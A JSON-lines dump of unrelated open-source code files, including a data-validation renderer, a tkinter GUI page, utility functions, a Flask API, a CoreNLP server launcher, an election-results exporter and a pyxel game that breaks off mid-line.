add_values_with_json_schema_from_list_in_params(\n params=params,\n params_with_json_schema=params_with_json_schema,\n param_key_with_list=\"value_set\",\n )\n\n return (template_str, params_with_json_schema, styling)\n\n @classmethod\n @renderer(renderer_type=\"renderer.prescriptive\")\n @render_evaluation_parameter_string\n def _prescriptive_renderer(\n cls,\n configuration=None,\n result=None,\n language=None,\n runtime_configuration=None,\n **kwargs,\n ):\n runtime_configuration = runtime_configuration or {}\n include_column_name = runtime_configuration.get(\"include_column_name\", True)\n include_column_name = (\n include_column_name if include_column_name is not None else True\n )\n styling = runtime_configuration.get(\"styling\")\n\n params = substitute_none_for_missing(\n configuration.kwargs,\n [\"column\", \"value_set\", \"row_condition\", \"condition_parser\"],\n )\n\n if params[\"value_set\"] is None or len(params[\"value_set\"]) == 0:\n\n if include_column_name:\n template_str = \"$column distinct values must belong to this set: [ ]\"\n else:\n template_str = \"distinct values must belong to a set, but that set is not specified.\"\n\n else:\n\n for i, v in enumerate(params[\"value_set\"]):\n params[f\"v__{str(i)}\"] = v\n values_string = \" \".join(\n [f\"$v__{str(i)}\" for i, v in enumerate(params[\"value_set\"])]\n )\n\n if include_column_name:\n template_str = (\n f\"$column distinct values must belong to this set: {values_string}.\"\n )\n else:\n template_str = (\n f\"distinct values must belong to this set: {values_string}.\"\n )\n\n if params[\"row_condition\"] is not None:\n (\n conditional_template_str,\n conditional_params,\n ) = parse_row_condition_string_pandas_engine(params[\"row_condition\"])\n template_str = f\"{conditional_template_str}, then {template_str}\"\n params.update(conditional_params)\n\n return [\n RenderedStringTemplateContent(\n **{\n \"content_block_type\": \"string_template\",\n \"string_template\": {\n \"template\": template_str,\n \"params\": params,\n \"styling\": styling,\n },\n }\n )\n ]\n\n @classmethod\n @renderer(renderer_type=\"renderer.descriptive.value_counts_bar_chart\")\n def _descriptive_value_counts_bar_chart_renderer(\n cls,\n configuration=None,\n result=None,\n language=None,\n runtime_configuration=None,\n **kwargs,\n ):\n assert result, \"Must pass in result.\"\n value_count_dicts = result.result[\"details\"][\"value_counts\"]\n if isinstance(value_count_dicts, pd.Series):\n values = value_count_dicts.index.tolist()\n counts = value_count_dicts.tolist()\n else:\n values = [\n value_count_dict[\"value\"] for value_count_dict in value_count_dicts\n ]\n counts = [\n value_count_dict[\"count\"] for value_count_dict in value_count_dicts\n ]\n\n df = pd.DataFrame(\n {\n \"value\": values,\n \"count\": counts,\n }\n )\n\n if len(values) > 60:\n return None\n else:\n chart_pixel_width = (len(values) / 60.0) * 500\n if chart_pixel_width < 250:\n chart_pixel_width = 250\n chart_container_col_width = round((len(values) / 60.0) * 6)\n if chart_container_col_width < 4:\n chart_container_col_width = 4\n elif chart_container_col_width >= 5:\n chart_container_col_width = 6\n elif chart_container_col_width >= 4:\n chart_container_col_width = 5\n\n mark_bar_args = {}\n if len(values) == 1:\n mark_bar_args[\"size\"] = 20\n\n bars = (\n alt.Chart(df)\n .mark_bar(**mark_bar_args)\n .encode(y=\"count:Q\", x=\"value:O\", tooltip=[\"value\", \"count\"])\n .properties(height=400, width=chart_pixel_width, autosize=\"fit\")\n )\n\n chart = bars.to_json()\n\n new_block = RenderedGraphContent(\n **{\n \"content_block_type\": \"graph\",\n \"header\": RenderedStringTemplateContent(\n **{\n \"content_block_type\": \"string_template\",\n \"string_template\": {\n \"template\": \"Value Counts\",\n \"tooltip\": {\n \"content\": \"expect_column_distinct_values_to_be_in_set\"\n },\n \"tag\": \"h6\",\n },\n }\n ),\n \"graph\": chart,\n \"styling\": {\n \"classes\": [f\"col-{str(chart_container_col_width)}\", \"mt-1\"],\n },\n }\n )\n\n return new_block\n\n def validate_configuration(\n self, configuration: Optional[ExpectationConfiguration]\n ) -> None:\n \"\"\"Validating that user has inputted a value set and that configuration has been initialized\"\"\"\n super().validate_configuration(configuration)\n\n try:\n assert \"value_set\" in configuration.kwargs, \"value_set is required\"\n assert (\n isinstance(configuration.kwargs[\"value_set\"], (list, set, dict))\n or configuration.kwargs[\"value_set\"] is None\n ), \"value_set must be a list, set, or None\"\n if isinstance(configuration.kwargs[\"value_set\"], dict):\n assert (\n \"$PARAMETER\" in configuration.kwargs[\"value_set\"]\n ), 'Evaluation Parameter dict for value_set kwarg must have \"$PARAMETER\" key'\n except AssertionError as e:\n raise InvalidExpectationConfigurationError(str(e))\n\n def _validate(\n self,\n configuration: ExpectationConfiguration,\n metrics: Dict,\n runtime_configuration: dict = None,\n execution_engine: ExecutionEngine = None,\n ):\n parse_strings_as_datetimes = self.get_success_kwargs(configuration).get(\n \"parse_strings_as_datetimes\"\n )\n observed_value_counts = metrics.get(\"column.value_counts\")\n observed_value_set = set(observed_value_counts.index)\n value_set = self.get_success_kwargs(configuration).get(\"value_set\") or []\n\n if parse_strings_as_datetimes:\n parsed_value_set = parse_value_set(value_set)\n else:\n parsed_value_set = value_set\n\n expected_value_set = set(parsed_value_set)\n\n if not expected_value_set:\n success = True\n else:\n success = observed_value_set.issubset(expected_value_set)\n\n return {\n \"success\": success,\n \"result\": {\n \"observed_value\": sorted(list(observed_value_set)),\n \"details\": {\"value_counts\": observed_value_counts},\n },\n }\n","repo_name":"franciscojavierarceo/Python","sub_path":"demos/great-expectations/venv/lib/python3.8/site-packages/great_expectations/expectations/core/expect_column_distinct_values_to_be_in_set.py","file_name":"expect_column_distinct_values_to_be_in_set.py","file_ext":"py","file_size_in_byte":15029,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"41220525451","text":"from tkinter import *\nfrom PIL import ImageTk, Image\nfrom setupPages.step4 import Step4\n\nclass Step3():\n def __init__(self, root, parent):\n self.parent = parent\n self.root = root\n self.backgroundPng = ImageTk.PhotoImage(Image.open(\"Assets/Setup_Page_Assets/Step3/background.png\"))\n self.backButtPng = ImageTk.PhotoImage(Image.open(\"Assets/Setup_Page_Assets/Step3/Button/back.png\"))\n self.createDataPng = ImageTk.PhotoImage(Image.open(\"Assets/Setup_Page_Assets/Step3/Button/create.png\"))\n self.font = \"Bahnschrift\"\n self.primaryColor = \"#ff793f\"\n\n def draw(self):\n self.step3_frame = Frame(self.root, bg=\"white\", width=1080, height=650)\n self.step3_frame.place(x=0, y=0)\n\n self.background = Label(self.step3_frame, bg=\"white\", bd=0, image=self.backgroundPng )\n self.background.photo = self.backgroundPng\n self.background.place(x=12, y=5)\n\n self.heading = Label(self.step3_frame, fg=\"black\", text=\"Let's Setup Your\", bd=0, bg=\"white\", font=(self.font, 30, 'normal'))\n self.heading.place(x=725, y=300)\n\n self.heading1 = Label(self.step3_frame, fg=self.primaryColor, text=\"Database\", bd=0, bg=\"white\",\n font=(self.font, 30, 'normal'))\n self.heading1.place(x=725, y=350)\n\n def back():\n self.destroy()\n\n self.backButt = Button(self.step3_frame, bg=\"white\", activebackground=\"white\", bd=0,\n image=self.backButtPng, command=back)\n self.backButt.photo = self.backButtPng\n self.backButt.place(x=20, y=15)\n\n def create():\n Step4(root=self.root, parent=self.step3_frame).draw()\n\n self.createData = Button(self.step3_frame, bg=\"white\", activebackground=\"white\", bd=0,\n image=self.createDataPng, command=create)\n self.createData.photo = self.createDataPng\n self.createData.place(x=725, y=450)\n\n def destroy(self):\n self.step3_frame.destroy()\n\n","repo_name":"ManishJangid007/Attendence-Management-System","sub_path":"Admin/setupPages/step3.py","file_name":"step3.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22455142086","text":"from functools import wraps\nfrom logging import handlers\nfrom datetime import timedelta, datetime\nimport os\nimport time\nimport logging\n\n\nclass Logger(object):\n level_relations = {\n 'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'crit': logging.CRITICAL\n }\n\n def __init__(self, filename, level='info', when='D', backCount=3):\n log_path = os.path.dirname(filename)\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n fmt = '%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'\n self.logger = logging.getLogger(filename)\n format_str = logging.Formatter(fmt) # 设置日志格式\n self.logger.setLevel(self.level_relations.get(level)) # 设置日志级别\n sh = logging.StreamHandler() # 往屏幕上输出\n sh.setFormatter(format_str) # 设置屏幕上显示的格式\n th = handlers.TimedRotatingFileHandler(filename=filename, when=when, backupCount=backCount, encoding='utf-8')#往文件里写入#指定间隔时间自动生成文件的处理器\n # S 秒\n # M 分\n # H 小时、\n # D 天、\n # W 每星期(interval==0时代表星期一)\n # midnight 每天凌晨\n th.setFormatter(format_str) # 设置文件里写入的格式\n self.logger.addHandler(sh) # 把对象加到logger里\n self.logger.addHandler(th)\n\n\ndef clock_it(func):\n @wraps(func)\n def inner_func(*args, **kwargs):\n print(\"EXECUTE FUNC: {}\".format(func.__name__))\n print(\"START TIME: {}\".format(time.strftime(\"%Y-%m-%d-%H-%M-%S\")))\n start_time = time.time()\n result = func(*args, **kwargs)\n print(\"END TIME: {}\".format(time.strftime(\"%Y-%m-%d-%H-%M-%S\")))\n end_time = time.time()\n print(\"EXECUTE TIME: {:.3f} s\".format((end_time-start_time)))\n return result\n return inner_func\n\n\ndef parse_pub_time(pub_time):\n pub_time = pub_time.strip()\n now = datetime.now()\n if ':' in pub_time:\n delta = timedelta(days=0)\n n_days = now + delta\n return n_days.strftime('%Y-%m-%d ') + pub_time[:-2] # 去掉发布两个字\n elif '1天' in pub_time:\n delta = timedelta(days=-1)\n n_days = now + delta\n return n_days.strftime('%Y-%m-%d')\n elif '2天' in pub_time:\n delta = timedelta(days=-2)\n n_days = now + delta\n return n_days.strftime('%Y-%m-%d')\n elif '3天' in pub_time:\n delta = timedelta(days=-3)\n n_days = now + delta\n return n_days.strftime('%Y-%m-%d')\n elif '-' in pub_time:\n return pub_time\n\n\ndef parse_job_addr(ls):\n addr = ''\n for i in ls:\n addr = addr + i.strip()\n return addr.strip('查看地图')\n\n\ndef list_isempty(ls):\n \"\"\"\n xpath规则的结果可能为空,针对这种情况,不为空返回第一个值,为空返回空串\n :param ls:\n :return:\n \"\"\"\n if ls:\n return ls[0].strip()\n else:\n return ''\n","repo_name":"hkl778250693/musician","sub_path":"ManhuiPlanAutoFill/logger_utils.py","file_name":"logger_utils.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40822287230","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 5 22:11:38 2017\n\n@author: tzb\n\"\"\"\nimport numpy as np\n\n\"\"\"\nPurity is defined as follows:\n Purity = (1/n)* sum(max(n_{ij}))\nwhere n_{ij} is the number of data points in the j-th cluster that belong to the i-th class.\nPurity measures the extent to which each cluster contains data points from primarily one class.\n\"\"\"\n\n\ndef get_purity(y, predy): # inputs: label_true, label_predict\n \"\"\"\n compute the purity of clustering\n \n Arguments:\n y -- the true label of samples\n ypred -- the predicted label of samples\n predy -- \n \n Returns:\n purity\n \"\"\"\n\n if len(y) != len(predy):\n assert ('y与predy长度不同')\n n = len(y)\n y = get_classes(y)\n predy = get_classes(predy)\n totle = 0\n for key in predy:\n pred_cluster = predy[key]\n mx = 0\n for key1 in y:\n cluster = y[key1]\n mx = max(mx, len(set(cluster).intersection(set(pred_cluster))))\n totle = totle + mx\n\n purity = 1.0 * totle / n\n return purity\n\n\ndef get_classes(y):\n labels = np.unique(y)\n result = {}\n for label in labels:\n result[label] = []\n for i in range(len(y)):\n if y[i] == label:\n result[label].append(i)\n return result\n\n\nif __name__ == '__main__':\n y = np.array([1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 3, 1, 1, 3, 3, 3])\n predy = np.array([1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3])\n print(get_purity(y, predy))\n y = [1, 2]\n predy = [1, 1]\n print(get_purity(y, predy))\n print(get_purity(predy, y))\n","repo_name":"keneeth-tzb/AutoCodeBasedMethod","sub_path":"util/purity.py","file_name":"purity.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20367656353","text":"import numpy as np\r\n\r\ndef read_ply(ply_file):\r\n '''Gets an ASCII ply file and returns a dictionary with x,y,z,nx,ny,nz,red,green,blue, faces (the ones that are presented\r\n in the file. If some value is missed (eg. no normals) the dict will not have that value.'''\r\n properties=[]#List of property names\r\n with open(ply_file, 'r') as f:\r\n lines = f.readlines()\r\n j=0\r\n faces_num=0\r\n for line in lines:\r\n if line.startswith('element vertex'):\r\n verts_num = int(line.split(' ')[-1])\r\n elif line.startswith('element face'):\r\n faces_num = int(line.split(' ')[-1])\r\n elif line.startswith('property'):\r\n properties.append(line.split(' ')[-1].strip('\\n'))\r\n elif line.startswith('end_header'):\r\n start_line=j+1\r\n break\r\n j+=1\r\n \r\n ply_dict={} \r\n verts_lines = lines[start_line:start_line + verts_num]\r\n \r\n verts = np.array([list(map(float, l.strip().split(' '))) for l in verts_lines])\r\n if faces_num>0:\r\n faces_lines = lines[start_line + verts_num:]\r\n faces = np.array([list(map(int, l.strip().split(' '))) for l in faces_lines])[:,1:]\r\n ply_dict['faces'] = faces\r\n \r\n i=0\r\n while i None:\n \"\"\"Called when the websocket connection is established.\n\n In this demo, we're simply logging the successful connection event.\n \"\"\"\n self.log.info(\"Successfully connected to the server with the session token!\")\n\n async def on_message_received(self, message: WSMessage) -> None:\n \"\"\"Called when a (text) message is received from the server.\n\n In this demo, we're logging the original message received from the server.\n \"\"\"\n self.log.info(f\"Received message from server: {message.msg}\")\n # Further processing of the message can go here\n\n async def on_error(self, exception: Exception) -> None:\n \"\"\"Called when an error message is received from the server\n\n In this demo, we're logging the error.\n \"\"\"\n self.log.error(f\"An error occurred: {exception}\")\n # Additional error handling can go here\n","repo_name":"doyensec/wsrepl","sub_path":"docs/demo-2.py","file_name":"demo-2.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":142,"dataset":"github-code","pt":"48"} +{"seq_id":"38122274910","text":"#dynamic programming\ndef maxProduct(nums):\n # Initialize the variables\n maxProd = minProd = res = nums[0]\n\n # Iterate over the array starting from the second element\n for num in nums[1:]:\n # If the current number is negative, swapping the max and min product will be beneficial\n if num < 0:\n maxProd, minProd = minProd, maxProd\n\n # We either take the current number as the start of a new subarray, or include it in an existing subarray\n maxProd = max(num, maxProd * num)\n minProd = min(num, minProd * num)\n\n # Update the result with the maximum product\n res = max(res, maxProd)\n\n return res\n#time O(n)\n#space O(1)\n","repo_name":"0xspringtime/leetcode","sub_path":"0152n.py","file_name":"0152n.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8014576403","text":"from core.bases.api import APIBase\nfrom flask import request\nfrom todolist.board_column.requests import (\n CreateBoardColumn,\n DeleteBoardColumn,\n GetBoardColumn,\n UpdateBoardColumn,\n)\n\n\nclass BoardColumnListAPI(APIBase):\n def __init__(self, use_cases, *args, **kwargs):\n self.use_cases = use_cases\n super().__init__(*args, **kwargs)\n\n def set_methods(self):\n return {\"POST\": self.create}\n\n def create(self, board_id: int, *args, **kwargs):\n resp = self.use_cases.create_board_column(\n CreateBoardColumn(\n board_id=request.json.get(\"board_id\"), name=request.json.get(\"name\")\n )\n )\n\n return resp.item.to_json() if resp.is_ok else resp.dump_errors(), resp.status\n\n\nclass BoardColumnSingleAPI(APIBase):\n def __init__(self, use_cases, *args, **kwargs):\n self.use_cases = use_cases\n super().__init__(*args, **kwargs)\n\n def set_methods(self):\n return {\"GET\": self.get_by_id, \"PUT\": self.update, \"DELETE\": self.delete}\n\n def get_by_id(self, board_id: int, id: int, *args, **kwargs):\n resp = self.use_cases.get_board_column(\n req=GetBoardColumn(board_id=board_id, id=id)\n )\n\n return resp.item.to_json() if resp.is_ok else resp.dump_errors(), resp.status\n\n def update(self, board_id: int, id: int, *args, **kwargs):\n resp = self.use_cases.update_board_column(\n req=UpdateBoardColumn(\n id=id,\n board_id=request.json.get(\"board_id\"),\n name=request.json.get(\"name\"),\n )\n )\n\n return resp.item.to_json() if resp.is_ok else resp.dump_errors(), resp.status\n\n def delete(self, id: int, *args, **kwargs):\n resp = self.use_cases.delete_board_column(req=DeleteBoardColumn(id=id))\n\n return {} if resp.is_ok else resp.dump_errors(), resp.status\n\n\ndef register_routes(app, use_cases):\n board_column_list_api = BoardColumnListAPI(use_cases)\n board_column_single_api = BoardColumnSingleAPI(use_cases)\n\n board_column_list_api.register_api(\n app,\n \"/api/todolist/boards/columns\",\n \"todolist.board_column.list\",\n )\n board_column_single_api.register_api(\n app,\n \"/api/todolist/boards/columns/\",\n \"todolist.board_column.single\",\n )\n","repo_name":"felipeflamarion/clean-arch","sub_path":"todolist/board_column/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5721426719","text":"#!/usr/bin/python\nimport psycopg2\nfrom configparser import ConfigParser\nimport datetime\n\ndef get_amount():\n \"\"\" query data from the material movement table \"\"\"\n conn = None\n try:\n params = config()\n conn = psycopg2.connect(**params)\n cur = conn.cursor()\n\n #tas\n jenis_value={};\n jenis_index={};\n tas={};\n cur.execute(\"SELECT DISTINCT coalesce(jc.name,'') \\\n FROM vw_cps_last_3_day dy \\\n LEFT JOIN tta_coal_prod_stat_coal_index AS ci \\\n ON dy.generate_series=ci.date \\\n LEFT JOIN tta_coal_prod_stat_jenis_coal_index AS jc \\\n ON ci.jenis=jc.id \\\n WHERE coalesce(jc.name,'') <> '' \\\n limit 3 \")\n rowcount=cur.rowcount\n print(\"The number of row: \", rowcount)\n row = cur.fetchone()\n counter=0\n item={}\n\n if rowcount>0:\n f=open('../../data_coal_index.csv','w')\n f.write('date,')\n while row is not None:\n #print(row)\n jenis_index[counter]=row[0]\n f.write(jenis_index[counter])\n counter+=1\n if counter0:\n while row is not None:\n #f.write(str(row[3])+',')\n date=str(row[0])\n jenis=str(row[1])\n val=str(row[2])\n if date not in item:\n item_2={}\n for ah in jenis_index:\n item_2[jenis_index[ah]]=\"0\"\n item[date]=item_2\n else:\n item_2=item[date]\n item_2[jenis]=val\n row = cur.fetchone()\n\n for i in item:\n f.write(i+',')\n counter=0\n for idx in item[i]:\n tmp=item[i]\n f.write(tmp[idx])\n if counter < len(item[i])-1:\n f.write(',')\n counter+=1\n f.write(\"\\n\")\n f.close()\n cur.close()\n\n print(str(datetime.datetime.now())+' '+str(rowcount)+' row updated')\n except (Exception, psycopg2.DatabaseError) as error:\n print(str(datetime.datetime.now())+' '+str(error))\n finally:\n if conn is not None:\n conn.close()\n\ndef config(filename='database.ini', section='postgresql'):\n # create a parser\n parser = ConfigParser()\n # read config file\n parser.read(filename)\n\n # get section, default to postgresql\n db = {}\n if parser.has_section(section):\n params = parser.items(section)\n for param in params:\n db[param[0]] = param[1]\n else:\n raise Exception('Section {0} not found in the {1} file'.format(section, filename))\n\n return db\n\nif __name__ == '__main__':\n get_amount()\n","repo_name":"hendriramadhon/mamot_report","sub_path":"lib/py/read_coal_index.py","file_name":"read_coal_index.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9396510040","text":"import sys\r\n\r\n\r\n# sys.stdin = open(\"input.txt\")\r\ninput = sys.stdin.readline\r\n\r\n\r\n\r\nn = int(input().strip())\r\nmy_list = list(map(int,input().split()))\r\nmy_list.sort()\r\nq = int(input().strip())\r\nquery = list(map(int,input().split()))\r\n\r\nans_list = []\r\nfor q in query :\r\n\r\n l,r = 0, len(my_list)-1\r\n ans = 9876543210\r\n while l <= r :\r\n mid = (l+r)//2\r\n\r\n if q < my_list[mid]:\r\n r = mid - 1\r\n elif my_list[mid] < q:\r\n l = mid + 1\r\n else :\r\n ans = mid\r\n break\r\n if ans == 9876543210 : ans_list.append(-1)\r\n else : ans_list.append(ans)\r\n\r\nprint(\" \".join(map(str,ans_list)))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"chickenchickenlove/BOJ-Algorithm","sub_path":"Certi/python30.py","file_name":"python30.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41830552884","text":"from bs4 import BeautifulSoup\nimport os\n\nfor file_name in os.listdir():\n if file_name.endswith(\".html\"):\n with open(file_name, 'r') as f:\n contents = f.read()\n soup = BeautifulSoup(contents, 'html.parser')\n section = soup.find(\"section\", {\"class\": \"display-7\"})\n if section:\n section.decompose()\n with open(file_name, 'w') as f:\n f.write(str(soup))","repo_name":"localservices-app/recomand.app","sub_path":"remove.py","file_name":"remove.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6507622266","text":"import json\nfrom collections import defaultdict\n\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import DefaultStorage\nfrom django.core.management.base import BaseCommand\nfrom django.db.models import Prefetch\nfrom popolo.models import Membership\nfrom uk_results.models import ResultSet\nfrom utils.dict_io import BufferDictWriter\n\n\nclass Command(BaseCommand):\n FIELDNAMES = [\n \"election_id\",\n \"ballot_paper_id\",\n \"person_id\",\n \"party_id\",\n \"party_name\",\n \"person_name\",\n \"ballots_cast\",\n \"elected\",\n \"spoilt_ballots\",\n \"turnout\",\n \"turnout_percentage\",\n \"total_electorate\",\n \"source\",\n ]\n\n def add_arguments(self, parser):\n parser.add_argument(\"--election-date\", action=\"store\", required=True)\n\n parser.add_argument(\n \"--format\", action=\"store\", required=True, choices=[\"csv\", \"json\"]\n )\n\n def handle(self, **options):\n date = options[\"election_date\"]\n format = options[\"format\"]\n directory_path = \"csv-archives\"\n self.storage = DefaultStorage()\n output_filename = \"{}/results-{}.{}\".format(\n directory_path, date, format\n )\n\n qs = (\n ResultSet.objects.filter(ballot__election__election_date=date)\n .select_related(\"ballot\", \"ballot__election\")\n .prefetch_related(\n Prefetch(\n \"ballot__membership_set\",\n Membership.objects.select_related(\"person\", \"party\"),\n )\n )\n )\n out_data = []\n for result in qs:\n for membership in result.ballot.membership_set.all():\n if not hasattr(membership, \"result\"):\n continue\n row = {\n \"election_id\": result.ballot.election.slug,\n \"ballot_paper_id\": result.ballot.ballot_paper_id,\n \"turnout\": result.num_turnout_reported,\n \"turnout_percentage\": result.turnout_percentage,\n \"spoilt_ballots\": result.num_spoilt_ballots,\n \"total_electorate\": result.total_electorate,\n \"source\": result.source,\n }\n party = membership.party\n try:\n if party.name == \"Independent\":\n party_id = \"ynmp-party:2\"\n else:\n party_id = (\n party.identifiers.filter(\n scheme=\"electoral-commission\"\n )\n .get()\n .identifier\n )\n except membership.party.DoesNotExist:\n party_id = \"\"\n row[\"party_id\"] = party_id\n row[\"party_name\"] = party.name\n row[\"person_id\"] = membership.person.pk\n row[\"person_name\"] = membership.person.name\n row[\"ballots_cast\"] = membership.result.num_ballots\n row[\"elected\"] = membership.elected\n out_data.append(row)\n\n if format == \"csv\":\n csv_out = BufferDictWriter(fieldnames=self.FIELDNAMES)\n csv_out.writeheader()\n for row in out_data:\n csv_out.writerow(row)\n out_string = csv_out.output\n else:\n json_data = defaultdict(dict)\n for person in out_data:\n election_dict = json_data[person[\"ballot_paper_id\"]]\n election_dict[\"turnout\"] = person[\"turnout\"]\n election_dict[\"turnout_percentage\"] = person[\n \"turnout_percentage\"\n ]\n election_dict[\"spoilt_ballots\"] = person[\"spoilt_ballots\"]\n election_dict[\"total_electorate\"] = person[\"total_electorate\"]\n election_dict[\"source\"] = person[\"source\"]\n\n if \"candidates\" not in election_dict:\n election_dict[\"candidates\"] = []\n election_dict[\"candidates\"].append(\n {\n \"person_name\": person[\"person_name\"],\n \"person_id\": person[\"person_id\"],\n \"party_name\": person[\"party_name\"],\n \"party_id\": person[\"party_id\"],\n \"ballots_cast\": person[\"ballots_cast\"],\n \"elected\": person[\"elected\"],\n }\n )\n election_dict[\"candidates\"] = sorted(\n election_dict[\"candidates\"],\n key=lambda p: p[\"ballots_cast\"],\n reverse=True,\n )\n out_string = json.dumps(json_data, indent=4)\n\n self.storage.save(\n output_filename, ContentFile(out_string.encode(\"utf8\"))\n )\n","repo_name":"DemocracyClub/yournextrepresentative","sub_path":"ynr/apps/uk_results/management/commands/uk_results_create_file.py","file_name":"uk_results_create_file.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"22783900287","text":"\"\"\" Starts a number of CoreNLP servers \"\"\"\nimport argparse\nimport subprocess\nimport os\nimport pdb\n\n\ndef start_servers(start_port, n_servers):\n os.chdir('CoreNLP')\n processes = []\n for i in range(n_servers):\n cmd = f'sh start_corenlp_server.sh {start_port+i}'\n process = subprocess.Popen(cmd, shell=True)\n processes.append(process)\n\n return processes\n\n\ndef stop_servers(start_port, n_servers):\n # Find PIDs, kill\n for i in range(n_servers):\n try:\n pid = subprocess.check_output([\"pgrep\", '-f', f'port {start_port+i}'])\n pid = int(pid[:-1])\n os.kill(pid, 9)\n except subprocess.CalledProcessError as e:\n print(f'Port {start_port+i} not able to be killed')\n continue\n\n # Remove tmp lock\n shutdown_keypath = 'CoreNLP/tmp/corenlp.shutdown'\n if os.path.exists(shutdown_keypath):\n os.remove(shutdown_keypath)\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description='Starts or stops a number of CoreNLP servers')\n parser.add_argument('start_port', nargs='?', type=int, help='an integer for the accumulator')\n parser.add_argument('n_servers', nargs='?', type=int, help='the number of servers to start or stop')\n parser.add_argument('--start', dest='start', action='store_true')\n parser.add_argument('--stop', dest='stop', action='store_true')\n parser.set_defaults(start=False)\n parser.set_defaults(stop=False)\n args = parser.parse_args()\n\n if args.start:\n start_servers(args.start_port, args.n_servers)\n elif args.stop:\n stop_servers(args.start_port, args.n_servers)\n\nif __name__ == '__main__':\n main()\n","repo_name":"michaelmilleryoder/fanfiction-nlp-archive","sub_path":"run_corenlp_servers.py","file_name":"run_corenlp_servers.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2647130710","text":"import pyxel\nimport math\nimport random\nimport csv\n\n\nclass Game():\n\n def __init__(self):\n\n pyxel.init(128,128,\"NDC 2023\",60)\n pyxel.mouse(True)\n pyxel.load('res.pyxres')\n\n self.posx,self.posy = None,None\n self.velx,self.vely = None,None\n self.hp_max = None\n self.hp = None\n self.hp_percent = None\n self.deathcd = None\n\n self.shoot_cd = None\n self.shoot_rate = None\n self.spread = None\n self.amount_bullet = None\n self.bullets = None\n\n self.explosions = None\n\n self.boss = None\n\n self.menus = None\n self.text_screen = None\n for index,line in enumerate(csv.reader(open(\"scoreboard.csv\", \"r\"))):\n if index == 0:\n self.highscore = [line[0],int(line[1])]\n self.score = None\n self.time = None\n self.scene = None\n\n self.menu()\n\n pyxel.run(self.update,self.draw)\n\n def menu(self):\n\n self.menus = [\n [Button(32,64,\"Start\",self.start),Button(32,80,\"Scoreboard\",self.scoreboard),Button(32,96,\"Quit game\",pyxel.quit)],\n [Button(8,112,\"Menu\",self.menu)],\n [],\n [Button(8,112,\"Save\",self.save)]\n ]\n self.text_screen = \"\"\n self.name = None\n self.scene = 0\n\n def start(self):\n\n self.posx,self.posy = 64,96\n self.velx,self.vely = 0,0\n self.hp_max = 100\n self.hp = self.hp_max\n self.hp_percent = 1\n self.deathcd = 0\n\n self.shoot_rate = 2\n self.spread = 10\n self.amount_bullet = 3\n self.bullets = []\n\n self.explosions = []\n\n self.boss = Boss(64,16,1,2,3)\n\n self.time = pyxel.frame_count\n self.name = Name()\n self.scene = 2\n\n def save(self):\n\n score_line = [self.score[0],self.score[1],int(self.hp_percent*100),int(self.boss.hp_percent*100),self.time]\n \n scoreboard = [x for x in csv.reader(open(\"scoreboard.csv\", \"r\"))]\n output = []\n while len(scoreboard) < 13:\n scoreboard.append([\" X \",0,0,0,0])\n\n for x in range(13):\n if int(score_line[1]) > int(scoreboard[x][1]):\n output.append(score_line)\n score_line = scoreboard[x]\n else:\n output.append(scoreboard[x])\n \n scoreboard = csv.writer(open(\"scoreboard.csv\", \"w\", newline=\"\"))\n scoreboard.writerows(output)\n\n self.scoreboard()\n\n def scoreboard(self):\n\n self.scene = 1\n\n scoreboard = csv.reader(open(\"scoreboard.csv\", \"r\"))\n self.text_screen = \" NAM SCO HLT BOS TIM\\n\\n\"\n for index,line in enumerate(scoreboard):\n self.text_screen += (\" \"*(2-len(str(index+1)))) + str(index+1) + \" \" + str(line[0]) + \" \" + str(line[1]) + (\" \"*(5-len(str(line[1])))) + str(line[2]) + \"%\" + (\" \"*(4-len(str(line[2])))) + str(line[3]) + \"%\" + (\" \"*(3-len(str(line[3])))) + str(line[4]) + \"s\\n\"\n\n def update(self):\n\n if self.scene == 1:\n\n self.scoreboard()\n \n if self.scene == 2 or self.scene == 3:\n if self.hp_percent > 0:\n self.player()\n else:\n self.death()\n self.boss.update(self)\n for bullet in self.bullets:\n bullet.update()\n if bullet.posx > self.boss.posx - 12 and bullet.posx < self.boss.posx + 12 and bullet.posy > self.boss.posy - 12 and bullet.posy < self.boss.posy + 12 and bullet.type == 0:\n self.boss.hp = max(self.boss.hp-1,0)\n bullet.alive = False\n if bullet.posx > self.posx - 3 and bullet.posx < 